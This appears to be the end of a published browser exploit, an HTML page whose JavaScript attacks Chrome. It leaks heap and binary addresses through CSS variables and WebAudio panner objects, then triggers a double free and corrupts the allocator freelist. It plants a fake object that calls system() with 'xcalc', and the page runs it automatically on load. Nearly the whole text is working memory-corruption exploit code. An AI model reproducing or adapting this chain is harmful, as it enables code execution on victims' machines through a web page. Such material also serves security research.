let rs = getComputedStyle(div0);
let CSSLeak = rs.getPropertyValue(kTargetCSSVar)
.substring(0x15000 - 8);
console.log(CSSLeak.length.toString(16));
let memoryPattern = /\x02\x00\x00\x00\x14\x04\x00\x01(\d+\.\d+)/g;
CSSVars = [...CSSLeak.matchAll(memoryPattern)];
console.log(CSSVars);
if (CSSVars.length < kSprayPannerCount) {
console.log("WARN: insufficient CSSVars found, found vs min:",
CSSVars.length, "vs", kSprayPannerCount);
return;
}
console.log("corrupted with success");
for (let i = 0; i < kSprayPannerCount; i++) {
panners.push(audioCtx.createPanner());
}
for (let i = 0; i < kSprayPannerCount; i++) {
// console.log(`removing --b${CSSVars[i][1]}`);
// i really idk why, but i need add the ref_count_ and remove the
// prop to trigger free
rs.getPropertyValue(`--b${CSSVars[i][1]}`);
div0.style.removeProperty(`--b${CSSVars[i][1]}`);
}
gc(); gc(); await sleep(1000);
for (let i = 0; i < panners.length; i++) {
panners[i].panningModel = 'HRTF';
}
// free two panners after target CSSVariableData
panners[kSprayPannerCount - 2].panningModel = 'equalpower';
panners[kSprayPannerCount - 1].panningModel = 'equalpower';
await sleep(1000);
let hrtfLeak = rs.getPropertyValue(kTargetCSSVar)
.substring(0x15000 - 8);
for (let i = 0; i < CSSVars.length; i++) {
let leak = hrtfLeak.substring(CSSVars[i].index, CSSVars[i].index + 8);
console.log("0x" + u64(leak).toString(16),
"0x" + CSSVars[i].index.toString(16));
}
heapAddr = (u64(hrtfLeak.substring(CSSVars[8].index + 8,
CSSVars[8].index + 8 + 8)) & 0xfffffffffff00000n) + 0xc000n;
fakePannerAddr = heapAddr - 0x959000n + BigInt(CSSVars[8].index);
chromeBase = u64(hrtfLeak.substring(CSSVars[8].index,
CSSVars[8].index + 8));
chromeBase -= kHRTFPannerVtableOffset;
console.log("heap leak: 0x" + heapAddr.toString(16),
CSSVars[1].index.toString(16));
console.log("chrome leak: 0x" + chromeBase.toString(16),
CSSVars[8].index.toString(16));
console.log("fakePannerAddr: 0x" + fakePannerAddr.toString(16));
// search '13.1CCCCC' anon:partition_alloc ; x/gx addr+0x2000-8
console.log("CSSVarData UAF: 0x" + (heapAddr - 0x982000n)
.toString(16));
console.log("hrtfLeak.length: 0x" + hrtfLeak.length.toString(16));
gc();
setTimeout(doubleFree, 1000);
}
async function doubleFree() {
console.log("start free(CSSVariableData)")
let div0 = document.getElementById('div0');
let div1 = document.getElementById('div1');
let audioCtxDelay = audioCtxArr.pop();
let delayNode = delayNodeArr.pop();
let srcNode = srcNodeArr.pop();
let ab = new ArrayBuffer(0x600);
let abFakeObj = new ArrayBuffer(0x600);
let view = new BigUint64Array(ab);
let viewFakeObj = new DataView(abFakeObj);
view[0] = swapEndian(fakePannerAddr - 0x10n);
for (let i = 0; i < viewFakeObj.byteLength; i++)
viewFakeObj.setUint8(i, 0x4a); // "J"
const system_addr = chromeBase + kSystemLibcOffset;
// call qword ptr [rax + 8]
viewFakeObj.setBigUint64(0x0, fakePannerAddr + 8n - 8n, true);
// viewFakeObj.setBigUint64(8, 0xdeadbeefn, true);
viewFakeObj.setBigUint64(0x8, chromeBase + kWriteListenerOffset,
true);
// fake BindState addr
viewFakeObj.setBigUint64(0x10, fakePannerAddr + 0x18n, true);
// start of fake BindState
// 0x636c616378 == xcalc
viewFakeObj.setBigUint64(0x18 + 0,
0x636c616378n /* -1 because ref_count_ + 1 */ - 1n, true);
viewFakeObj.setBigUint64(0x18 + 0x8, system_addr, true);
let rs = getComputedStyle(div0);
for (let i = 0; i < 10; i++) {
div1.style.setProperty(`--sprayD${i}`, kCSSStringCross0x2000);
}
rs.getPropertyValue(kTargetCSSVar);
div0.style.removeProperty(kTargetCSSVar);
gc(); gc();
await sleep(1000);
console.log("start free(AudioBuffer)");
// ((0.466796875 * 4096 * 1024) / 1024 + 0x80) * 4 + 0x20 == 0x2000
let delayToAlloc0x2000 = 0.466796875;
audioCtxDelay.oncomplete = async () => {
// now freelist is circular A => A
console.log("delay nodes deleted, freelist should be circular");
gc(); gc(); gc(); gc();
await sleep(3000);
// overwrite freelist pointer to fakePannerAddr
// allocAudioArray copy/paste function because on call the same
// func 3 times will start compilation and change heap layout
let audioCtxDelay = new OfflineAudioContext(1, 4096, 4096);
let delayNode = audioCtxDelay.createDelay(delayToAlloc0x2000);
let buffer = audioCtx.createBuffer(1, 0x600, 4096);
let dstData = buffer.getChannelData(0);
new Uint8Array(dstData.buffer).set(new Uint8Array(ab));
let srcNode = audioCtxDelay.createBufferSource();
srcNode.buffer = buffer;
srcNode.connect(delayNode).connect(audioCtxDelay.destination);
audioCtxDelay.suspend(0x600 / 4096.0);
srcNode.start();
audioCtxDelay.startRendering();
// copy/paste
await sleep(500);
// consume freelist entry
div1.style.setProperty('--tick', kCSSStringCross0x2000);
// allocAudioArray copy/paste function because on call the same
// func 3 times will start compilation and change heap layout
let audioCtxDelay3 = new OfflineAudioContext(1, 4096, 4096);
let delayNode3 = audioCtxDelay3.createDelay(delayToAlloc0x2000);
let buffer3 = audioCtx.createBuffer(1, 0x600, 4096);
let dstData3 = buffer3.getChannelData(0);
new Uint8Array(dstData3.buffer).set(new Uint8Array(abFakeObj));
let srcNode3 = audioCtxDelay3.createBufferSource();
srcNode3.buffer = buffer3;
srcNode3.connect(delayNode3).connect(audioCtxDelay3.destination);
audioCtxDelay3.suspend(0x600 / 4096.0);
srcNode3.start();
audioCtxDelay3.startRendering();
// copy/paste
await sleep(1000);
for (let i = panners.length - 3; i >= 0; i--) {
panners[i].panningModel = 'equalpower';
}
console.log("destructors called")
};
audioCtxDelay.resume();
}
</script>
</head>
<body onload="pwn();">
<div id="div0"></div>
<div id="div1"></div>
</body>
</html>
|=[ EOF ]=--------------------------------------------------------------=|